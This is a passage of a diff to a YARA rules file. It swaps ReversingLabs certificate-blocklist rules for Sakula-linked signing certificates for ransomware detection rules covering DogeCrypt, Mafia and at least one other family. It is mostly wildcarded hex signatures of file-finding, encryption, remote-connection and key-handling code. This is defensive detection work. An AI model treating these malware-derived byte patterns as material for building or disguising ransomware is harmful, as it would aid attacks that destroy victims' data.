+            72 ?? ?? ?? ?? A2 0A 1F ?? 8D ?? ?? ?? ?? 25 16 1F ?? 28 ?? ?? ?? ?? A2 25 17 1E 28 ??
+            ?? ?? ?? A2 25 18 1F ?? 28 ?? ?? ?? ?? A2 25 19 1F ?? 28 ?? ?? ?? ?? A2 25 1A 1F ?? 28
+            ?? ?? ?? ?? A2 25 1B 1B 28 ?? ?? ?? ?? A2 25 1C 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ??
+            ?? ?? 28 ?? ?? ?? ?? A2 25 1D 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ??
+            ?? A2 25 1E 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 25 1F ?? 72
+            ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 0B 16 0C 2B ?? 07 08 9A 0D
+            1F ?? 28 ?? ?? ?? ?? 13 ?? 09 72 ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11
+            ?? 11 ?? 9A 28 ?? ?? ?? ?? 13 ?? 06 11 ?? 28 ?? ?? ?? ?? 2C ?? 02 11 ?? 11 ?? 9A 11 ??
+            28 ?? ?? ?? ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 32 ?? 00 02 09 28 ?? ?? ?? ?? DE ??
+            26 DE ?? 08 17 58 0C 08 07 8E 69 32 ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 20 ?? ?? ?? ??
+            28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ??
+            ?? 26 DE ?? 26 DE ?? 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 20
+            ?? ?? ?? ?? 6F ?? ?? ?? ?? 2A
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NexG" and pe.signatures [ i ] . serial == "5e:3d:76:dc:7e:27:3e:2f:31:3f:c0:77:58:47:a2:a2" and 1372723199 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( $dusk_delete_itself )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_47D5D5372Bcb1562B4C9F4C2Bdf13587 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Dogecrypt : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing Sakula malware."
+		description = "Yara rule that detects DogeCrypt ransomware."
 		author = "ReversingLabs"
-		id = "d888478e-3883-5d9d-a2b3-d59b57409b8d"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "e0ca22a5-70bb-5d2c-bce4-bac49c2a81d2"
+		date = "2021-04-28"
+		modified = "2021-04-28"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2086-L2102"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.DogeCrypt.yara#L1-L114"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "fb4994647a2ed95c73625d90315c9b6deb6fb3b81b4aa6e847b0193f0a76650c"
+		logic_hash = "1c19862884cf1e59d12c84f5ff6f799a4087ddc8bd887e0d2ce7da053642b851"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "DogeCrypt"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files_DogeCrypt_p1 = {
+            50 E8 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ??
+            ?? BA ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 0F 43 15 ?? ?? ?? ?? 8B 85
+            ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 2B C6 89 B5 ?? ?? ?? ?? 3B C8 77 ?? 83 BD ?? ?? ?? ??
+            ?? 8D 3C 31 8D 04 09 89 BD ?? ?? ?? ?? 50 8B 85 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 0F 43
+            B5 ?? ?? ?? ?? 52 8D 04 46 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 66 89 04 7E EB ?? 51 52
+            C6 85 ?? ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ??
+            ?? 8D 45 ?? 8B 35 ?? ?? ?? ?? 0F 43 45 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68
+            ?? ?? ?? ?? 50 FF D6 8B F8 83 FF ?? 74 ?? 83 BD ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A
+            ?? 0F 43 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 FF D6 8B
+            F0 83 FE ?? 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B
+            8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ??
+            2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ??
+            ?? ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ??
+            ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ??
+            ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ??
+            ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ??
+            ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ??
+            ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ??
+            ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83
+        }
+		$encrypt_files_DogeCrypt_p2 = {
+            C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? 83
+            FA ?? 0F 82 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ??
+            ?? 0F 82 ?? ?? ?? ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? E9
+            ?? ?? ?? ?? 90 6A ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF
+            15 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? BA ?? ?? ?? ?? 81 F9 ?? ?? ?? ?? 0F 42 DA 85 C0 74
+            ?? 85 C9 74 ?? 51 8D 85 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 6A ??
+            53 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? EB ?? 56 8B 35 ?? ?? ?? ?? FF D6 57
+            FF D6 83 7D ?? ?? 8D 45 ?? 0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 52 51 E8
+            ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 33 C0 66 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? 89 85 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ??
+            ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83
+            C4 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5
+            5D C3
+        }
+		$find_files_DogeCrypt = {
+            8B FF 55 8B EC 51 8B 4D ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 57 8B 7D ?? 2B CA 8B C7 41
+            F7 D0 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 53 56 8D 5F ?? 03 D9 6A ?? 53 E8 ?? ?? ??
+            ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? FF
+            75 ?? 2B DF 8D 04 3E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 5D ?? 8B
+            CB E8 ?? ?? ?? ?? 33 FF 89 45 ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ?? 8B 75 ?? 59 EB ?? 8B
+            43 ?? 89 30 8B F7 83 43 ?? ?? 57 E8 ?? ?? ?? ?? 59 8B C6 5E 5B 5F 8B E5 5D C3 33 FF
+            57 57 57 57 57 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33
+            C5 89 45 ?? 8B 4D ?? 53 8B 5D ?? 57 8B 7D ?? 89 9D ?? ?? ?? ?? EB ?? 8A 01 3C ?? 74
+            ?? 3C ?? 74 ?? 3C ?? 74 ?? 51 57 E8 ?? ?? ?? ?? 59 59 8B C8 3B CF 75 ?? 8A 11 80 FA
+            ?? 75 ?? 8D 47 ?? 3B C8 74 ?? 53 33 DB 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 33 DB
+            80 FA ?? 74 ?? 80 FA ?? 74 ?? 8A C3 80 FA ?? 75 ?? B0 ?? 0F B6 C0 2B CF 41 F7 D8 56
+            1B C0 23 C1 68 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ??
+            83 C4 ?? 8D 85 ?? ?? ?? ?? 53 53 53 50 53 57 FF 15 ?? ?? ?? ?? 8B F0 8B 85 ?? ?? ??
+            ?? 83 FE ?? 75 ?? 50 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 83 FE ?? 74 ?? 56 FF 15
+            ?? ?? ?? ?? 8B C3 5E 8B 4D ?? 5F 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 48 ?? 2B 08
+            C1 F9 ?? 89 8D ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 8A 8D ?? ?? ?? ?? 84 C9 74 ??
+            80 F9 ?? 75 ?? 38 9D ?? ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50
+            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0
+            8B 85 ?? ?? ?? ?? 75 ?? 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B C8 0F 84
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? E9
+        }
+		$decrypt_DesucryptKeyContainer_DogeCrypt = {
+            68 ?? ?? ?? ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? E8 ?? ?? ?? ?? C7 45 ?? ??
+            ?? ?? ?? 8D 55 ?? 83 7D ?? ?? 8B 5D ?? 8B 35 ?? ?? ?? ?? 0F 43 D3 A1 ?? ?? ?? ?? 8B
+            4D ?? 2B C6 89 75 ?? 3B C8 77 ?? 83 3D ?? ?? ?? ?? ?? 8D 3C 31 8D 04 09 89 3D ?? ??
+            ?? ?? 50 8B 45 ?? BE ?? ?? ?? ?? 0F 43 35 ?? ?? ?? ?? 52 8D 04 46 50 E8 ?? ?? ?? ??
+            83 C4 ?? 33 C0 66 89 04 7E EB ?? 51 52 C6 45 ?? ?? FF 75 ?? 51 B9 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8B 5D ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 8D 0C 45 ?? ?? ?? ??
+            8B C3 81 F9 ?? ?? ?? ?? 72 ?? 8B 5B ?? 83 C1 ?? 2B C3 83 C0 ?? 83 F8 ?? 0F 87 ?? ??
+            ?? ?? 51 53 E8 ?? ?? ?? ?? 83 C4 ?? 83 3D ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 6A ?? 0F 43
+            05 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
+            8B F0 83 FE ?? 0F 84 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 6A ?? 68 ?? ??
+            ?? ?? 56 FF D3 83 F8 ?? 0F 85 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 50 E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 8D 45 ?? 6A ??
+            50 C6 07 ?? FF 35 ?? ?? ?? ?? 57 56 FF D3 83 F8 ?? 75 ?? BA ?? ?? ?? ?? B9 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 35 ?? ??
+            ?? ?? 57 FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? BA ?? ?? ?? ?? B9 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ??
+            ?? ?? EB ?? 33 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ??
+            ?? ?? 8B E5 5D C3 E8 ?? ?? ?? ?? E8
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DTOPTOOLZ Co.,Ltd." and pe.signatures [ i ] . serial == "47:d5:d5:37:2b:cb:15:62:b4:c9:f4:c2:bd:f1:35:87" and 1400803199 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $decrypt_DesucryptKeyContainer_DogeCrypt ) and ( $find_files_DogeCrypt ) and ( all of ( $encrypt_files_DogeCrypt_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_3Ac10E68F1Ce519E84Ddcd28B11Fa542 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Mafia : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing Sakula malware."
+		description = "Yara rule that detects Mafia ransomware."
 		author = "ReversingLabs"
-		id = "9cc0e518-84c8-5b23-b8cb-e0e0fe7849bd"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "67f09000-751f-539a-b222-25b1502c2728"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2104-L2120"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Mafia.yara#L1-L142"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "dac3b6b7609ec1e82afe4f9c6c14e2d32b6f5d8d49c59d6c605f2a94d71bc107"
+		logic_hash = "5c17b799f0b4f1f8f72a2e4203a6606f7783ceec2034694f8a21ff65e5afdb26"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Mafia"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files = {
+            55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ??
+            ?? ?? 53 56 57 68 ?? ?? ?? ?? 8D 44 24 ?? 8B F1 6A ?? 50 89 74 24 ?? C7 44 24 ?? ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 33 C9 68 ?? ?? ?? ?? 51 8D 94 24 ?? ?? ?? ?? 52 66 89 8C 24
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 68 ?? ?? ?? ?? 50 8D 8C 24 ?? ?? ?? ?? 51 66 89 84
+            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ??
+            ?? 83 C4 ?? 8D 44 24 ?? 50 8D 8C 24 ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B D8 83 FB ??
+            0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ??
+            ?? ?? ?? 8B 35 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 68 ?? ?? ?? ?? 8D
+            8C 24 ?? ?? ?? ?? 6A ?? 51 E8 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52 8D 84 24 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? 51 FF D6 B8 ?? ??
+            ?? ?? 5F 5E 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3 56 81 EC ?? ??
+            ?? ?? B9 ?? ?? ?? ?? 8D B4 24 ?? ?? ?? ?? 8B FC F3 A5 E8 ?? ?? ?? ?? 81 C4 ?? ?? ??
+            ?? 8D 54 24 ?? 52 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 44 24 ?? 50 81 EC ?? ?? ?? ??
+            B9 ?? ?? ?? ?? 8D B4 24 ?? ?? ?? ?? 8B FC F3 A5 E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 8D
+            4C 24 ?? 51 53 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 53 FF 15 ?? ?? ?? ?? 8B 8C 24 ?? ?? ??
+            ?? 5F 5E 5B 33 CC 33 C0 E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$remote_connection_p1 = {
+            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 33 C0 57
+            68 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 66 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85
+            ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 6A ?? 52 C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 8D 8D ?? ?? ?? ?? 6A ?? 51 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 85 C0 75 ??
+            68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
+            68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 52 E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 83 C4 ?? 33 C0 68 ??
+            ?? ?? ?? 50 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ??
+            8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 51 E8 ??
+            ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F0 33 C0 89 85
+        }
+		$remote_connection_p2 = {
+            89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ??
+            ?? 66 89 95 ?? ?? ?? ?? 8B 48 ?? 8B 11 8B 02 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8D
+            95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF
+            15 ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ??
+            83 F8 ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 50 ?? 8B FF 8A 08 40 84 C9 75 ?? 6A
+            ?? 2B C2 50 8D 8D ?? ?? ?? ?? 51 56 FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 95 ??
+            ?? ?? ?? 52 56 FF D3 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85
+            C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D7 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 50
+            8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 FF
+            D7 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 51 E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8D
+            85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 FF D7
+            68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 6A ?? 52 E8 ?? ?? ?? ?? 53 8D 85 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 FF D7 68 ?? ?? ?? ?? 8D 95
+            ?? ?? ?? ?? 6A ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF
+            15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 40 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? EB
+            ?? 68 ?? ?? ?? ?? FF D7 56 FF 15 ?? ?? ?? ?? 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ??
+            8B E5 5D C3 68
+        }
+		$encrypt_files_p1 = {
+            55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ??
+            ?? ?? 53 56 8B 75 ?? 57 68 ?? ?? ?? ?? 33 DB 8D 8C 24 ?? ?? ?? ?? 33 C0 53 51 66 89
+            84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 54 24 ?? 53 52 89 5C 24
+            ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 44 24 ?? 53 50 89 5C 24 ?? E8 ?? ?? ?? ?? 83 C4
+            ?? 33 C0 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 53 51 89 5C 24 ?? 89 44 24 ?? 89 44 24
+            ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
+            68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 53 52 88 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
+            ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 53 50 88 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
+            C4 ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 33 C9 53 52 66 89 8C 24 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8B 4D ?? 8B C1 83 C4 ?? 48 74 ?? 48 74 ?? 8B 45 ?? 8B 55 ?? 50 52 51 56 FF
+            15 ?? ?? ?? ?? 5F 5E 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C2
+        }
+		$encrypt_files_p2 = {
+            53 FF 15 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5F 5E 5B 33 CC 33 C0 E8 ?? ?? ?? ?? 8B E5
+            5D C2 ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ??
+            FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 50 E8
+            ?? ?? ?? ?? 83 C4 ?? 33 F6 E8 ?? ?? ?? ?? 25 ?? ?? ?? ?? 79 ?? 48 0D ?? ?? ?? ?? 40
+            88 86 ?? ?? ?? ?? 46 83 FE ?? 7C ?? 33 F6 E8 ?? ?? ?? ?? 25 ?? ?? ?? ?? 79 ?? 48 0D
+            ?? ?? ?? ?? 40 88 86 ?? ?? ?? ?? 46 83 FE ?? 7C ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 8D 49 ?? 0F B6 83 ?? ?? ?? ?? 6A
+            ?? 8D 94 24 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? 51 8D 94
+            24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 83 C4 ?? 8B C8
+            8A 10 40 84 D2 75 ?? 8D BC 24 ?? ?? ?? ?? 2B C1 8B F1 4F 8A 4F ?? 47 84 C9 75 ?? 8B
+            C8 C1 E9 ?? F3 A5 8B C8 83 E1 ?? 8D 84 24 ?? ?? ?? ?? F3 A4 8B C8 8A 10 40 84 D2 75
+            ?? BF ?? ?? ?? ?? 2B C1 8B F1 4F 8A 4F ?? 47 84 C9 75 ?? 8B C8 C1 E9 ?? F3 A5 8B C8
+        }
+		$encrypt_files_p3 = {
+            68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 83 E1 ?? 6A ?? 50 F3 A4 E8 ?? ?? ?? ?? 83 C4 ??
+            68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A ?? 51 E8 ?? ?? ?? ?? 43 83 C4 ?? 83 FB ?? 0F
+            8C ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ??
